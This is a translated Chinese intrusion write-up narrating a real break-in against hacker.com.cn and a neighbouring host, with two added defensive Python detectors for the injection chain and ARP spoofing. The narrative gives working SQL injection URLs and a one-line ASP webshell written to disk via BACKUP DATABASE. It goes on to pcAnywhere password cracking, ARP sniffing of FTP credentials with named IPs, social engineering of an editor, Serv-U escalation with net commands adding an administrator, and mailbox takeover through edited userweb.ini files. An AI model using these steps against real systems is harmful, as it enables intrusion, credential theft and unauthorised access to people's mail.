Foreword: I don't want to point fingers at you, but some of you go too far: taking someone else's manuscript and selling it for money, taking someone else's technique and passing it off as your own; that is one thing. It is your arrogance that forces me to remind you: your superiority is built on other people.
First, scanned the target and found FTP ..... no common vulnerabilities ..... so I settled on ARP spoofing and sniffing.
Second, find a host to sniff from:
C:\>ping Hacker.com.cn
Pinging Hacker.com.cn [211.157.102.239] with 32 bytes of data:
Scan 211.157.102.1-211.157.102.255 on ports 80 and 1433. Found a site with a default directory, and in it an SQL injection point:
http://xx.xx.xx.xx/111.asp?id=3400 and 1=(select is_srvrolemember('sysadmin'))
The condition is false, so the login is not in the sysadmin role: no sa privileges (the CREATE TABLE and BACKUP DATABASE below still work because the application's login owns its own database). Next, read a database name out of the catalog:
http://xx.xx.xx.xx/111.asp?id=3400 and 1=(select name from master.dbo.sysdatabases where dbid=7)
(The original had "sdatabases", a typo for sysdatabases.) Comparing a name to the integer 1 forces a conversion error, and the error message carries the database name: KU1.
Now to plant a shell (credit to brother Night for the information on this); if you don't follow, look up the online references:
http://xx.xx.xx.xx/111.asp?id=3400;Create Table [DBO].[xiaolu]([xiaoxue] [char](255));--
http://xx.xx.xx.xx/111.asp?id=3400;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into xiaolu(xiaoxue) values(@result);--
http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 xiaoxue from xiaolu)=1
The first request creates a scratch table; the second reads the W3SVC "Virtual Roots" key in the registry (the "/" value holds the physical path of the site root; the original showed the key with forward slashes, corrected to backslashes here) and stores the result in the table; the third compares the stored string with an integer so the conversion error echoes it back. That gives the web root, D:\xxxx. Next:
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;CREATE TABLE cmd (str image);--
http://xx.xx.xx.xx/111.asp?id=3400;INSERT INTO cmd (str) VALUES ('<%if Request("a")<>"" then execute Request("a")%>');--
http://xx.xx.xx.xx/111.asp?id=3400;Backup Database ku1 to disk='d:\xxxx\l.asp';--
The one-line ASP backdoor was garbled in the original; the standard form from the "smallest ASP backdoor" animation is restored here. BACKUP DATABASE writes the whole database, including the row holding that tag, into the web root as l.asp; the ASP engine passes the binary junk through as literal output and executes the tag, so the file works as a shell. (For how to use this shell, see the animation on the smallest ASP backdoor: http://666w.cn/down/view.asp?id=754)
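The chain above (role probe, catalog read, xp_regread path discovery, BACKUP DATABASE into the web root) leaves a distinctive trail in the IIS log. The following Python is an added example, not part of the original write-up: it decodes W3C-style log lines, flags each stage of the chain and reports which client IPs reached the webshell-drop stage. The log lines are constructed to mirror the requests above; the field layout (date, time, client IP, method, URI stem, query, status), the rule names and the stage labels are my own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed W3C-style IIS log lines (sample input, not from the page); the
# query strings mirror the injection chain in the write-up.
SAMPLE_LOG = r"""
2005-06-01 10:00:01 10.0.0.5 GET /111.asp id=3400 200
2005-06-01 10:00:05 10.0.0.5 GET /111.asp id=3400+and+1=(select+is_srvrolemember('sysadmin')) 500
2005-06-01 10:00:07 10.0.0.5 GET /111.asp id=3400+and+1=(select+name+from+master.dbo.sysdatabases+where+dbid=7) 500
2005-06-01 10:00:09 10.0.0.5 GET /111.asp id=3400;Create+Table+[DBO].[xiaolu]([xiaoxue]+[char](255));-- 200
2005-06-01 10:00:14 10.0.0.5 GET /111.asp id=3400;DECLARE+@result+varchar(255)+EXEC+master.dbo.xp_regread+'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual+Roots','/',@result+output+insert+into+xiaolu(xiaoxue)+values(@result);-- 200
2005-06-01 10:00:20 10.0.0.5 GET /111.asp id=3400;Backup+Database+Ku1+to+disk='d:\xxxx\l.asp';-- 200
2005-06-01 10:00:25 10.0.0.9 GET /111.asp id=42 200
"""

# Each rule: (name, stage, compiled regex on the decoded, lower-cased query).
# Stages follow the order the write-up's attack takes:
# recon -> stacked queries -> path discovery -> webshell drop.
RULES = [
    ("role_probe",     "recon", re.compile(r"\bis_srvrolemember\s*\(|\bis_member\s*\(")),
    ("catalog_read",   "recon", re.compile(r"\b(sysdatabases|sysobjects|syscolumns)\b")),
    ("stacked_ddl",    "stage", re.compile(r";\s*(create|insert|declare|exec|use|drop|backup)\b")),
    ("registry_read",  "path",  re.compile(r"\bxp_regread\b")),
    ("backup_to_disk", "drop",  re.compile(r"\bbackup\s+(database|log)\s+\S+\s+to\s+disk\s*=")),
    ("error_leak",     "recon", re.compile(r"\band\s+\d+\s*=\s*\(\s*select\b")),
]


def parse_line(line):
    """Split one W3C-style line into fields; None for blank or malformed lines."""
    parts = line.split()
    if len(parts) != 7:
        return None
    _date, _time, client, _method, stem, query, status = parts
    # unquote_plus turns '+' into spaces and decodes %xx escapes, so the
    # rules see the query the way SQL Server saw it.
    return {"client": client, "stem": stem, "query": unquote_plus(query), "status": status}


def classify(query):
    """Names of all rules that fire on a decoded query string, in RULES order."""
    q = query.lower()
    return [name for name, _stage, rx in RULES if rx.search(q)]


def scan(log_text):
    """(client, stem, matched_rules) for every request that trips a rule."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        matched = classify(rec["query"])
        if matched:
            hits.append((rec["client"], rec["stem"], matched))
    return hits


def chain_per_client(hits):
    """Collapse hits into a verdict per client IP.

    A client seen doing path discovery and then BACKUP ... TO DISK has very
    likely written a file into the web root, hence 'webshell_likely'.
    """
    stage_of = {name: stage for name, stage, _rx in RULES}
    stages = {}
    for client, _stem, rules in hits:
        stages.setdefault(client, set()).update(stage_of[r] for r in rules)
    verdict = {}
    for client, seen in stages.items():
        if {"path", "drop"} <= seen:
            verdict[client] = "webshell_likely"
        elif "drop" in seen or "stage" in seen:
            verdict[client] = "stacked_queries"
        else:
            verdict[client] = "probing"
    return verdict


if __name__ == "__main__":
    for client, stem, rules in scan(SAMPLE_LOG):
        print(client, stem, ",".join(rules))
    print(chain_per_client(scan(SAMPLE_LOG)))
```

The verdict is deliberately keyed on the combination of stages rather than on any single request: a lone is_srvrolemember probe is worth a look, but xp_regread followed by BACKUP DATABASE ... TO DISK from the same client is the point at which someone should be checking the web root for a fresh .asp file.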
Uploaded a shell through l.asp ............ and prepared to escalate. Found pcAnywhere installed, and found:
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\pca.xxx.cif
Cracked the password out of the .cif file and connected with pcAnywhere. Heaven was on our side: everything went smoothly, and we had both the administrator password and the pcAnywhere password :). A quick tracert to the target:
 1 <10 ms <10 ms <10 ms 211.157.102.239
One hop: hacker.com.cn sits on the same segment as the host we now own, so ARP spoofing will work. (On ARP spoofing, see an article I wrote in 2003: http://bbs.666w.cn/dispbbs.asp?boardid=7&id=764&page=1)
Upload the software we need through the webshell:
Winpcap.exe arpsniffer.exe pv.exe
ArpSniffer.exe ------------ 57K, sniffing tool for switched environments
pv.exe ---------------- 60K, the command-line program bundled with PrcView (Huajun has it for download), kills processes
WinPcap.exe ------------------ 678K, the packet capture driver the sniffer needs
Install WinPcap.exe: Next, Next, Finish.
Create a hidden virtual directory (look up how to do that yourself) with Application Protection set to Low, so that the ARP program we launch from the webshell runs inside the IIS process itself; keep the directory hidden, otherwise the administrator finds it too easily.
Third, start sniffing:
OK, on we go ........ start the sniffer ........ Given the state of China's network structure and the quality of the people running it, this works nearly every time. Run:
ArpSniffer.exe 211.157.102.254 211.157.102.239 21 C:\1.txt 1
211.157.102.254 is the gateway, 211.157.102.239 is the 黑防 (Hacker Defense) host, 21 is the FTP port, C:\1.txt is the log file, and 1 is the network card ID.
What next? Wait, of course... but we don't want to wait for days; we want results quickly. So brother Night takes action (heh heh) and chats up the 黑防 editor on QQ:
Black Night:
"黑防 has been hacked. I heard someone got in....... Go take a look quickly..."
Loner:
OK, I'll go look.
(This part is omitted.....)
Haha ......... you can guess the result. After a few minutes we saw the log file grow noticeably. Because ArpSniffer had been started directly in the foreground, I used the webshell to run:
pv -k -f ArpSniffer.exe
to kill the process, then read the password out of the log ~~~~~~
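The attack works because a box on the same segment can answer ARP for both the gateway and the 黑防 host and sit between them on port 21. The added example below is mine, not the author's ArpSniffer or anything from the page; it shows the defender's side: an arpwatch-style tracker that pins the gateway's MAC (the equivalent of a static ARP entry) and alerts when any IP is claimed by a new MAC, plus a check for one MAC answering for several IPs, which is exactly what a sniffer standing between gateway and target looks like. The ARP records and MAC addresses are constructed; the IPs are the ones from the write-up.

```python
from collections import defaultdict

# Constructed ARP reply records (sample input, not from the page):
# (seconds, sender_ip, sender_mac).  211.157.102.254 is the gateway and
# 211.157.102.239 the target, as in the write-up; the MACs are made up.
SAMPLE_ARP = [
    (0,  "211.157.102.254", "00:11:22:aa:bb:01"),  # gateway, legitimate
    (1,  "211.157.102.239", "00:11:22:aa:bb:02"),  # target host, legitimate
    (2,  "211.157.102.7",   "00:11:22:aa:bb:07"),  # attacker-controlled host
    (30, "211.157.102.254", "00:11:22:aa:bb:07"),  # gateway IP claimed by attacker MAC
    (31, "211.157.102.239", "00:11:22:aa:bb:07"),  # target IP claimed by attacker MAC
    (32, "211.157.102.254", "00:11:22:aa:bb:07"),  # poison repeated to keep caches stale
]


class ArpWatcher:
    """arpwatch-style IP -> MAC consistency tracker.

    pinned: IPs whose MAC is known out of band (e.g. the gateway); a reply
    carrying another MAC for such an IP is an alert and is never learned.
    Other IPs are learned on first sight and alerted on every change.
    """

    def __init__(self, pinned=None):
        self.pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
        self.table = dict(self.pinned)
        self.alerts = []

    def observe(self, ts, ip, mac):
        """Feed one ARP reply; returns an alert dict or None."""
        mac = mac.lower()
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac
            return None
        if known == mac:
            return None
        kind = "pinned_mismatch" if ip in self.pinned else "flip_flop"
        alert = {"ts": ts, "ip": ip, "old": known, "new": mac, "kind": kind}
        self.alerts.append(alert)
        if ip not in self.pinned:
            # Learn the change (as arpwatch does) so a flip back is also reported.
            self.table[ip] = mac
        return alert

    def run(self, records):
        for ts, ip, mac in records:
            self.observe(ts, ip, mac)
        return self.alerts


def macs_claiming_many(records):
    """MACs that answer for more than one IP.

    A host impersonating the gateway towards the victim and the victim
    towards the gateway necessarily shows up here.
    """
    ips = defaultdict(set)
    for _ts, ip, mac in records:
        ips[mac.lower()].add(ip)
    return {mac: sorted(v) for mac, v in ips.items() if len(v) > 1}


if __name__ == "__main__":
    watcher = ArpWatcher(pinned={"211.157.102.254": "00:11:22:aa:bb:01"})
    for a in watcher.run(SAMPLE_ARP):
        print(f"t={a['ts']:>3} {a['kind']:16} {a['ip']} {a['old']} -> {a['new']}")
    print(macs_claiming_many(SAMPLE_ARP))
```

Pinning is the detection counterpart of the fix the write-up implies: a static ARP entry for the gateway on the FTP host (and for the host on the gateway) stops the poisoning outright, and switch-side port security or dynamic ARP inspection stops it for the whole segment. The other half of the problem, plaintext FTP credentials, is untouched by any of that.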
Fourth, get to work:
Hey, this FTP account belongs to http://978229.hacker.com.cn/. Uploaded a shell, yeah! Every drive was browsable, yeah, yeah; so that's where you live, E:\wwwroot, haha.
Escalate privileges: Serv-U privilege escalation (Serv-U runs as SYSTEM, so anything launched through SITE EXEC runs as SYSTEM too). How to run a program? The administrator had renamed cmd.exe to King.exe and net.exe to Net1King.exe. Carry on: fpipe -v -l 3041 -r 43958 127.0.0.1, which forwards port 3041 to Serv-U's local administration port 43958, normally reachable only on loopback.
Add an FTP user, make it a Serv-U administrator, log in with it, then ("user" was dropped from the original net commands and is restored here):
quote site exec Net1King user xiaolu xiaoxue /add
quote site exec Net1King localgroup administrators xiaolu /add
Tried to log in on 3389: no. Keep going:
quote site exec Net1King user xiaolu Xiaoxue@@!#!@#@!!@#@123 /add
quote site exec Net1King localgroup administrators xiaolu /add
Haha, they had even set a password complexity policy; with a password that satisfies it, we're in. I won't describe what came next....... (N more lines omitted here)
Let's see what else is interesting: there's a WebEasyMail server. Let's see what the editors have in their mail, but I don't know the passwords.
Hey, follow me: in D:\mail\mail\ every user directory has a userweb.ini. Open it and set:
QuestionInfo=1
AnswerInfo=1
HintInfo=1
This turns on the password hint and lets us put in our own question and answer. Then go to http://hacker.com.cn/mail, click "Forgot your password", answer our own question, and we're in: so much mail, surely something good in there?
That's it for this round; the rest is left to the editors.
Fifth, summary:
This intrusion took about an hour. There is no advanced technique in it, only fairly shallow ones: sniffing for penetration is several years old, and SQL injection is the fashionable method and nothing new either. What made it possible to get the FTP password so easily was the bit of "social engineering".
Technique is valuable, but using it flexibly is what makes it more valuable.